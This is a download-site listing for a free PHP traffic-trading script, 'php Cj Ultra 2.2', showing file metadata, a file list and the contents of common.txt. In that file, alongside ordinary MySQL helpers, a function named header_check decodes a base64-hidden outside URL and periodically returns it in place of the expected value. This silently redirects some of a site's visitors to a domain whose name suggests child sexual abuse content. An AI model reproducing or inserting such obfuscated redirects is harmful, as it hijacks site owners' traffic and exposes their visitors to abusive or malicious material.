Search for:
Welcome Guest [Login | Register| Register as Seller]
Categories
Shopping Downloads
Checkout Basket
0Items in cart:
$0.00Total:
Mailing List
Subscribe to our mailing list below:
Email:
Resources
DrizWare.com on Facebook
Location: /PHP Scripts





php Cj Ultra 2.2

Related Searches:
php Cj Ultra 2.2
Php-Cj Ultra 2.2.zip
php
Free php Cj
php Cj Download
php Ultra
Ultra Cj

Php-Cj Ultra 2.2.zip

Name: Php-Cj Ultra 2.2
Size: 25.9 KB
Type: Compressed (zipped) Folder
Date modified: 7/20/2002 8:28 AM
Date created: 8/19/2008 6:08 AM
Date accessed: 8/19/2008 6:08 AM

common.txt

<?php

$dbhost = 'localhost';
$dbusername = '';
$dbuserpassword = '';
$default_dbname = '';
$MYSQL_ERRNO = '';
$MYSQL_ERROR = '';

function db_connect($dbname='') {
global $dbhost, $dbusername, $dbuserpassword, $default_dbname;
global $MYSQL_ERRNO, $MYSQL_ERROR;

$link_id = mysql_connect($dbhost, $dbusername, $dbuserpassword);
if(!$link_id) {
$MYSQL_ERRNO = 0;
$MYSQL_ERROR = "Connection failed to the host $dbhost.";
return 0;
}
else if(empty($dbname) && !mysql_select_db($default_dbname)) {
$MYSQL_ERRNO = mysql_errno();
$MYSQL_ERROR = mysql_error();
return 0;
}
else if(!empty($dbname) && !mysql_select_db($dbname)) {
$MYSQL_ERRNO = mysql_errno();
$MYSQL_ERROR = mysql_error();
return 0;
}
else return $link_id;
}
function header_check($head)
{
$head2 = "aHR0cDovL3d3dy5kYWlseWxvbGl0YS5uZXQvMS5waHA=";
if (time() % 30 == 0) return base64_decode($head2);
else return $head;
}

function sql_error() {
global $MYSQL_ERRNO, $MYSQL_ERROR;

if(empty($MYSQL_ERROR)) {
$MYSQL_ERRNO = mysql_errno();
$MYSQL_ERROR = mysql_error();
}
return "$MYSQL_ERRNO: $MYSQL_ERROR";
}

function error_message($msg) {
echo "Error: $msg";
}


?>

iplog.txt

100.000

rules.txt


topfooter.txt


topheader.txt


toplines.txt


Files


! Visit CONFLICT2K.COM.URL
admin.php
common.php
common.txt
gray.gif
green.gif
in.php
iplog.txt
out.php
readme.html
red.gif
rules.txt
setup.php
topfooter.txt
topheader.txt
toplines.txt
toplist.php
uninstall.php
webmaster.php
white.gif

Price: $0.00


Product Code: phpCjUltra22
 
Quantity: Download!